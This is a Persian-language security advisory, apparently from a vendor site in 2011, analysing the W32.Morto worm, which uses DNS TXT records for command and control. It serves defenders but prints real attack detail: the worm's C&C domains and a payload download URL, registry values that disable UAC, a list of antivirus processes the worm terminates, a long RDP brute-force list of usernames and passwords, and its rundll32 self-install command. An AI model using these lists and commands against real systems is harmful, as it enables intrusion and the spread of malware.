اطلاعات بيشتر درباره كرم W32.Morto

پس از گسترش پر هياهوي كرم W32.Morto كه اخبار بسياري در باره آن به گوش مي رسد، يكي از جنبه هاي بسيار مهم اين كرم ناديده گرفته شده است.

بيشتر بدافزارهايي كه اخيراً دنياي مجازي با آنها مواجه است به نوعي با يك سرور دستور دهي و كنترل از راه دور (Remote Command & Control Server) در ارتباط هستند. اين روش ارتباطي بين بدافزارها متنوع است، مثلاً از آنجا كه Trojan.Downbot مي تواند دستورات مخفي شده در صفحات HTML را استخراج و اجرا نمايد، بدافزار W32.IRCBot از كانال Internet Relay Chat استفاده مي كند.

آنچه درباره كرم W32.Morto اهميت ويژه اي دارد، روش جديد ارتباطي اين كرم است كه از ركورهاي DNS استفاده مي كند.
زماني كه صحبت از DNS به ميان مي آيد عموماً تنها دو مفهوم A Record و PTR Record به ذهن مي رسد. در حالي كه انواع ركوردهاي DNS بسيار متنوع بوده و تنها به اين دو مورد محدود نمي شوند. نوع ركوردي كه Morto از آن سوء استفاده مي كند ركورد TXT است.

DNS TXT در ابتدا جهت ذخيره سازي اطلاعاتي در DNS استفاده مي شد كه توسط انسان قابل خواندن باشد. به عنوان مثال زماني كه توسط nslookup درخواست TXT Record سايت Symantec.com را بدهيد، چنين عبارتي را دريافت خواهيد كرد:

Non-authoritative answer:
symantec.com text = "v=spf1 include:spf.symantec.com ip4:207.38.45.154 include:spf.messagelabs.com ~all"

زمان آزمايش Morto معلوم شد كه اين كرم درخواستهاي متعددي براي چندين URL مختلف ارسال مي كند. اين در حالي بود كه هيچ A Record متناسب با اين URL ها در DNS ها موجود نبود. در ادامه بررسي ها تشخيص داده شد كه در حقيقت اين كرم تنها درخواست TXT Record را مي دهد نه يك IP مرتبط با يك دامين. در پاسخ عبارت برگردانده شده يك متن كاملاً رمزنگاري شده است كه با استفاده از آن، كرم مستقر در سيستم از يك IP كه در اين عبارت درج شده است فايلي حاوي يك نرم افزار مخرب را دانلود كرده و آني اجرا مي كند.

در اين روش ارتباطي نكته شايان توجه اين است كه اصولاً داميني به نامي كه كرم درخواست مي دهد ثبت نشده است كه اين مشخص مي كند كه اين دامين ها اساساً از ابتدا براي تامين نيازاين كرم به TXT DNS Record هايش خلق شده اند.

از ديگر رفتارهاي كرم W32.Morto مي توان به فعاليتهاي توجه برانگيز آن بر روي پروتكل RDP اشاره كرد. همچنين اين كرم تعدادي Payload را به صورت رمزنگاري شده در رجيستري ذخيره كرده و آنها در برخي DLL هاي كم اهميت سيستم جايگزين مي كند.

توضيحات كامل فني شركت سيمانتك در باره اين كرم اينترنتي در زير آورده مي شود:
تاريخ كشف: August 28, 2011
تاريخ بروزرساني:August 29, 2011 8:41:16 AM
معرفي شده به نامهاي: Win32/Morto.A [Microsoft], W32/Morto.A [F-Secure], Mal/Morto-A [Sophos], WORM_MORTO.SMA [Trend], WORM_MORTO.SM [Trend]
گونه: Worm 
طول آلوده سازي: 50,372 bytes
سيستمهاي آسيب پذير: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

زماني كه كرم اجرا مي شود، يك كپي از خودش در مسير زير ايجاد مي كند:

%Windir%\Offline Web Pages\cache.txt

همچنين فايلهاي زير را نيز مي سازد:

%Windir%\Offline Web Pages\[CURRENT DATE]

سپس كرم يك كپي از %system%\sens.dll ساخته و آن را در مسير زير ذخيره مي كند:

%System%\Sens32.dll

آنگاه يك كپي از خود در مسير زير قرار مي دهد:

%System%\sens.dll

كرم Registry Subkey هاي زير را مي سازد:

HKEY_LOCAL_MACHINE\SYSTEM\WPA\sr
HKEY_LOCAL_MACHINE\SYSTEM\WPA\sn
HKEY_LOCAL_MACHINE\SYSTEM\WPA\rmd
HKEY_LOCAL_MACHINE\SYSTEM\WPA\md
HKEY_LOCAL_MACHINE\SYSTEM\WPA\it
HKEY_LOCAL_MACHINE\SYSTEM\WPA\ie
HKEY_LOCAL_MACHINE\SYSTEM\WPA\id
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_6TO4

سپس مقادير رجيستري زير را ايجاد مي كند:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows\"NoPopUpsOnBoot" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\"PendingFileRenameOperations" = "multi:"\00""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\6to4\"@" = "Service"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"ConsentPromptBehaviorAdmin" = "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"EnableLUA" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"d:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"e:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"f:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"g:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"h:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"i:\\windows\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"d:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"e:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"f:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"g:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"h:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"i:\\windows\\SysWOW64\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\winnt\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\win2008\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\win2k8\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\win7\\system32\\rundll32.exe" = "RUNASADMIN"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\"c:\\windows7\\system32\\rundll32.exe" = "RUNASADMIN"

همچنين مقادير رجيستري زير نيز توسط كرم ايجاد مي شوند:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters\"ServiceDll" = "expand:"%System%\Sens32.dll""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\"Group" = "SchedulerGroup"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\"DependOnService" = "multi:"\00""

در ادامه، اطلاعات قابل دانلودي را با ارسال درخواست نوع TXT به DNS (TXT DNS Record) به دامينهاي زير دريافت مي كند. اين دامينها توسط مهاجمين و هكرهاي توليد كننده اين كرم ثبت شده اند:

ds[RANDOM NUMBER].jifr.net
ft[RANDOM NUMBER].jifr.net
ms.jifr.co.be
ms.jifr.co.cc
ms.jifr.net
ss.jifr.net

با استفاده از اطلاعات بدست آمده فوق احتمالاً اطلاعات ديگري از مسير زير نيز دانلود مي شود:

210.3.38.82/160.rar

نكته اينكه اطلاعات دانلود شده يك فايل اجرايي مخرب است كه با نام Backdoor.Trojan شناخته مي شود.
سپس كرم خودش را به سرويس زير ملحق (Inject) مي كند:

svchost.exe

كليد رجيستري زير بدنه روزنگاري شده حمله را در خود دارد:

HKEY_LOCAL_MACHINE\SYSTEM\WPA\md

پس از كامل شدن نصب، كرم فايل اجرايي اصلي را حذف مي كند.

سپس كرم تلاش مي كند كه پروسس هاي زير را از كار بياندازد:

ACAAS
360rp
a2service
ArcaConfSV
AvastSvc
avguard
avgwdsvc
avp
avpmapp
ccSvcHst
cmdagent
coreServiceShell
ekm
FortiScand
FPAVServer
freshclam
fsdfwd
GDFwSvc
K7RTScan
knsdave
KVSrvXP
kxescore
mcshield
MPSvc
MsMpEng
NSESVC.EXE
PavFnSvr
RavMonD
SavService
scanwscs
SpySweeper
Vba32Ldr
vsserv
zhudongfangyu

در مرحله بعدي كرم مي كوشد كه ارتباطي نوع Remote Desktop از روي پورت 3389 را به سيستم هاي شبكه برقرار سازد. براي اين كار از تركيب ليست username و password هاي زير استفاده مي كند:

User name: administrator
Passwords:
1234
123
123456
admin
password
1
12345
12345678
1qaz2wsx
user
server
111111
test
111
%u%
123456789
123321
1111
123123
abc123
888888
0
pass
a
654321
000000
aaa
1234567890
1234567
%u%12
abcd1234
1234qwer
admin123
520520
369
1q2w3e
168168
!@#$%^
666666
%u%1
abc
520
2010
2012
secret
rockyou
iloveyou
%u%1234
%u%123
88888888
2222
121212
112233
zxcvbnm
31415926
12344321
12
1111111
!@#$%^&*
!@#$%
!@#$
super
qazwsx
computer
abcd
987654321
987654
789456
77777777
7777777
7777
7
4321
159357
1314520
1313
11223344
3
22222222
1QAZ
111222
%u%123456
%u%111111
princess
dragon
PASSWORD

User name: admin
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
user
server
111111

User name: test
Passwords:
111
%u%1234
123456789
123321
1111
123123
abc123
888888
0
pass
a
654321
000000
aaa
1234567890
1234567
%u%12
abcd1234
1234qwer
admin123
520520
369
1q2w3e
168168
!@#$%^
666666
letmein
%u%1
abc
secret
rockyou
iloveyou
Password
computer
abcd
%u%123
121212
zxcvbnm
12
super
qazwsx
111222
%u%123456
%u%111111
princess
dragon
PASSWORD

User name: user
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111
test
111
%u%1234
123456789
123321
1111
123123
abc123
888888
0
pass
a
654321
000000
aaa
1234567890
1234567
%u%12
abcd1234
1234qwer
admin123
520520
369
1q2w3e

User name: user1
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111
test
111
%u%1234
123456789
123321
1111
123123
abc123
888888
0
pass
a

User name: test
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111
test
111
%u%1234
123456789
123321
1111
123123
abc123
888888
0
pass
a

User name: user2
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111

User name: test1
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111

User name: user3
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111

User name: admin1
Passwords:
1234
123
123456
%u%
password
1
12345
12345678
1qaz2wsx
letmein
server
111111

User name: user4
Passwords:
1234
123
123456
%u%
password
1

User name: user5
Passwords:
1234
123
123456
%u%
password
1

User name: actuser
Passwords:
1234
123
123456
%u%
password
1

User name: admin2
Passwords:
1234
123
123456
%u%
password
1

User name: adm
Passwords:
1234
123
123456
%u%
password
1

User name: test2
Passwords:
1234
123
123456
%u%
password
1

User name: test3
Passwords:
1234
123
123456
%u%
password
1

User name: server
Passwords:
1234
123
123456
%u%
password
1

User name: 1
Passwords:
1234
123
123456
%u%
password
1

User name: guest
Passwords:
1234
123
123456
%u%
password
1

User name: aspnet
Passwords:
1234
123
123456
%u%
password
1

User name: sys
Passwords:
1234
123
123456
%u%
password
1

User name: support
Passwords:
1234
123
123456
%u%
password
1

User name: console
Passwords:
1234
123
123456
%u%
password
1

User name: 123
Passwords:
1234
123
123456
%u%
password
1

User name: root
Passwords:
1234
123
123456
%u%
password
1

User name: backup
Passwords:
1234
123
123456
%u%
password
1

User name: david
Passwords:
1234
123
123456
%u%
password
1

User name: sql
Passwords:
1234
123
123456
%u%
password
1

User name: a
Passwords:
1234
123
123456
%u%
password
1

User name: john
Passwords:
1234
123
123456
%u%
password
1

User name: support_388945a0
Passwords:
1234
123
123456
%u%
password
1

User name: owner
Passwords:
1234
123
123456
%u%
password
1

پس از برقراري ارتباط، كرم مسير Default RDP file share روي سرور را براي دسترسي به كلاينت باز مي كند:

\\tsclient

اين كرم با استفاده از دستور راه دور زير خودش را در سيستم هاي قرباني نصب مي كند:

rundll32 \\tsclient\a\a.dll a
تاريخ: سه‌شنبه 15 شهريور 1390  ساعت: 

پشتيباني مشتريان

دريافت نرم‌افزار

نظرسنجي

از چه ديواره آتشي استفاده مي‌كنيد؟
Cisco PIX

Netscreen

Watchguard

Packet Alarm